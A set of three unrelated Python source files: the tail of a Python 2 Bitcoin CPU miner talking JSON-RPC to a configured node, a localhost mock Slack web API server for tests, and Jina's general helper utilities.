if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 18026
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
mock_web_api_server.py
|
import json
import logging
import re
import sys
import threading
import time
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing.context import Process
from typing import Type
from unittest import TestCase
from urllib.request import Request, urlopen
from tests.helpers import get_mock_server_mode
class MockHandler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
default_request_version = "HTTP/1.1"
logger = logging.getLogger(__name__)
pattern_for_language = re.compile("python/(\\S+)", re.IGNORECASE)
pattern_for_package_identifier = re.compile("slackclient/(\\S+)")
def is_valid_user_agent(self):
user_agent = self.headers["User-Agent"]
return self.pattern_for_language.search(
user_agent
) and self.pattern_for_package_identifier.search(user_agent)
def set_common_headers(self):
self.send_header("content-type", "application/json;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
def do_GET(self):
if self.path == "/received_requests.json":
self.send_response(200)
self.set_common_headers()
self.wfile.write(json.dumps(self.received_requests).encode("utf-8"))
return
try:
if self.path == "/timeout":
time.sleep(2)
# user-agent-this_is-test
if self.path.startswith("/user-agent-"):
elements = self.path.split("-")
prefix, suffix = elements[2], elements[-1]
ua: str = self.headers["User-Agent"]
if ua.startswith(prefix) and ua.endswith(suffix):
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write("ok".encode("utf-8"))
self.wfile.close()
return
else:
self.send_response(HTTPStatus.BAD_REQUEST)
self.set_common_headers()
self.wfile.write("invalid user agent".encode("utf-8"))
self.wfile.close()
return
body = "{}"
if self.path.startswith("/logs"):
body = """{"entries":[{"id":"xxx-yyy-zzz-111","date_create":1611221649,"action":"user_login","actor":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"entity":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"context":{"location":{"type":"workspace","id":"T111","name":"WS","domain":"foo-bar-baz"},"ua":"UA","ip_address":"1.2.3.4","session_id":1656410836837}},{"id":"32c68de4-cbfa-4fcb-9780-25fdd5aacf32","date_create":1611221649,"action":"user_login","actor":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"entity":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"context":{"location":{"type":"workspace","id":"T111","name":"WS","domain":"foo-bar-baz"},"ua":"UA","ip_address":"1.2.3.4","session_id":1656410836837}}],"response_metadata":{"next_cursor":"xxx"}}"""
if self.path == "/schemas":
body = """{"schemas":[{"type":"workspace","workspace":{"id":"string","name":"string","domain":"string"}},{"type":"enterprise","enterprise":{"id":"string","name":"string","domain":"string"}},{"type":"user","user":{"id":"string","name":"string","email":"string","team":"string"}},{"type":"file","file":{"id":"string","name":"string","filetype":"string","title":"string"}},{"type":"channel","channel":{"id":"string","name":"string","privacy":"string","is_shared":"bool","is_org_shared":"bool","teams_shared_with":"Optional: varray<string>"}},{"type":"app","app":{"id":"string","name":"string","is_distributed":"bool","is_directory_approved":"bool","is_workflow_app":"bool","scopes":"array"}},{"type":"workflow","workflow":{"id":"string","name":"string"}},{"type":"barrier","barrier":{"id":"string","primary_usergroup":"string","barriered_from_usergroup":"string"}},{"type":"message","message":{"team":"string","channel":"string","timestamp":"string"}}]}"""
if self.path == "/actions":
body = """{"actions":{"workspace_or_org":["workspace_created","workspace_deleted","organization_created","organization_deleted","organization_renamed","organization_domain_changed","organization_accepted_migration","organization_declined_migration","emoji_added","emoji_removed","emoji_aliased","emoji_renamed","billing_address_added","migration_scheduled","workspace_accepted_migration","workspace_declined_migration","migration_completed","migration_dms_mpdms_completed","corporate_exports_approved","corporate_exports_enabled","manual_export_started","manual_export_completed","manual_export_downloaded","manual_export_deleted","scheduled_export_started","scheduled_export_completed","scheduled_export_downloaded","scheduled_export_deleted","channels_export_started","channels_export_completed","channels_export_downloaded","channels_export_deleted","manual_user_export_started","manual_user_export_completed","manual_user_export_downloaded","manual_user_export_deleted","ekm_enrolled","ekm_unenrolled","ekm_key_added","ekm_key_removed","ekm_clear_cache_set","ekm_logging_config_set","ekm_slackbot_enroll_notification_sent","ekm_slackbot_unenroll_notification_sent","ekm_slackbot_rekey_notification_sent","ekm_slackbot_logging_notification_sent","approved_orgs_added","approved_orgs_removed","organization_verified","organization_unverified","organization_public_url_updated","pref.admin_retention_override_changed","pref.allow_calls","pref.dlp_access_changed","pref.allow_message_deletion","pref.retention_override_changed","pref.app_dir_only","pref.app_whitelist_enabled","pref.block_file_download_for_unapproved_ip","pref.can_receive_shared_channels_invites","pref.commands_only_regular","pref.custom_tos","pref.disallow_public_file_urls","pref.display_real_names","pref.dm_retention_changed","pref.dnd_enabled","pref.dnd_end_hour","pref.dnd_start_hour","pref.emoji_only_admins","pref.ent_required_browser","pref.enterprise_default_channels","pref.block_download_and_copy_on_untrusted_mobile","pref.enterprise_mobile_device_check","pref.enterprise_team_creation_request","pref.file_retention_changed","pref.private_channel_retention_changed","pref.hide_referers","pref.loading_only_admins","pref.mobile_secondary_auth_timeout_changed","pref.msg_edit_window_mins","pref.notification_redaction_type","pref.required_minimum_mobile_version_changed","pref.public_channel_retention_changed","pref.session_duration_changed","pref.session_duration_type_changed","pref.sign_in_with_slack_disabled","pref.slackbot_responses_disabled","pref.slackbot_responses_only_admins","pref.stats_only_admins","pref.two_factor_auth_changed","pref.username_policy","pref.who_can_archive_channels","pref.who_can_create_public_channels","pref.who_can_create_delete_user_groups","pref.who_can_create_private_channels","pref.who_can_edit_user_groups","pref.who_can_remove_from_public_channels","pref.who_can_remove_from_private_channels","pref.who_can_manage_channel_posting_prefs","pref.who_can_manage_ext_shared_channels","pref.who_can_manage_guests","pref.who_can_manage_shared_channels","pref.sso_setting_changed"],"user":["custom_tos_accepted","guest_created","guest_deactivated","guest_reactivated","owner_transferred","role_change_to_admin","role_change_to_guest","role_change_to_owner","role_change_to_user","user_created","user_deactivated","user_login","user_login_failed","user_logout","user_reactivated","guest_expiration_set","guest_expiration_cleared","guest_expired","user_logout_compromised","user_session_reset_by_admin","user_session_invalidated","user_logout_non_compliant_mobile_app_version","user_force_upgrade_non_compliant_mobile_app_version"],"file":["file_downloaded","file_uploaded","file_public_link_created","file_public_link_revoked","file_shared","file_downloaded_blocked"],"channel":["user_channel_join","user_channel_leave","guest_channel_join","guest_channel_leave","public_channel_created","private_channel_created","public_channel_deleted","private_channel_deleted","public_channel_archive","private_channel_archive","public_channel_unarchive","private_channel_unarchive","mpim_converted_to_private","public_channel_converted_to_private","group_converted_to_channel","channel_workspaces_updated","external_shared_channel_invite_sent","external_shared_channel_invite_accepted","external_shared_channel_invite_approved","external_shared_channel_invite_created","external_shared_channel_invite_declined","external_shared_channel_invite_expired","external_shared_channel_invite_revoked","external_shared_channel_invite_auto_revoked","external_shared_channel_connected","external_shared_channel_disconnected","external_shared_channel_reconnected","channel_moved","channel_posting_pref_changed_from_org_level","channel_renamed","channel_email_address_created","channel_email_address_deleted"],"app":["app_installed","app_uninstalled","app_scopes_expanded","app_approved","app_restricted","app_removed_from_whitelist","app_resources_granted","app_token_preserved","workflow_app_token_preserved","bot_token_upgraded","bot_token_downgraded","org_app_workspace_added","org_app_workspace_removed","org_app_future_workspace_install_enabled","org_app_future_workspace_install_disabled","org_app_upgraded_to_org_install"],"workflow_builder":["workflow_created","workflow_deleted","workflow_published","workflow_unpublished","workflow_responses_csv_download"],"barrier":["barrier_created","barrier_updated","barrier_deleted"],"message":["message_tombstoned","message_restored"]}}"""
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write(body.encode("utf-8"))
self.wfile.close()
except Exception as e:
self.logger.error(str(e), exc_info=True)
raise
class MockServerProcessTarget:
def __init__(self, handler: Type[SimpleHTTPRequestHandler] = MockHandler):
self.handler = handler
def run(self):
self.handler.received_requests = {}
self.server = HTTPServer(("localhost", 8888), self.handler)
try:
self.server.serve_forever(0.05)
finally:
self.server.server_close()
def stop(self):
self.handler.received_requests = {}
self.server.shutdown()
self.join()
class MonitorThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self, daemon=True)
self.handler = handler
self.test = test
self.test.mock_received_requests = None
self.is_running = True
def run(self) -> None:
while self.is_running:
try:
req = Request(f"{self.test.server_url}/received_requests.json")
resp = urlopen(req, timeout=1)
self.test.mock_received_requests = json.loads(
resp.read().decode("utf-8")
)
except Exception as e:
# skip logging for the initial request
if self.test.mock_received_requests is not None:
logging.getLogger(__name__).exception(e)
time.sleep(0.01)
def stop(self):
self.is_running = False
self.join()
class MockServerThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self)
self.handler = handler
self.test = test
def run(self):
self.server = HTTPServer(("localhost", 8888), self.handler)
self.test.server_url = "http://localhost:8888"
self.test.host, self.test.port = self.server.socket.getsockname()
self.test.server_started.set() # threading.Event()
self.test = None
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
self.join()
def setup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.server_started = threading.Event()
test.thread = MockServerThread(test)
test.thread.start()
test.server_started.wait()
else:
# start a mock server as another process
target = MockServerProcessTarget()
test.server_url = "http://localhost:8888"
test.host, test.port = "localhost", 8888
test.process = Process(target=target.run, daemon=True)
test.process.start()
time.sleep(0.1)
# start a thread in the current process
# this thread fetches mock_received_requests from the remote process
test.monitor_thread = MonitorThread(test)
test.monitor_thread.start()
count = 0
# wait until the first successful data retrieval
while test.mock_received_requests is None:
time.sleep(0.01)
count += 1
if count >= 100:
raise Exception("The mock server is not yet running!")
def cleanup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.thread.stop()
test.thread = None
else:
# stop the thread to fetch mock_received_requests from the remote process
test.monitor_thread.stop()
retry_count = 0
# terminate the process
while test.process.is_alive():
test.process.terminate()
time.sleep(0.01)
retry_count += 1
if retry_count >= 100:
raise Exception("Failed to stop the mock server!")
# Python 3.6 does not have this method
if sys.version_info.major == 3 and sys.version_info.minor > 6:
# cleanup the process's resources
test.process.close()
test.process = None
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
from . import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from .parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: List[ArgumentParser] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
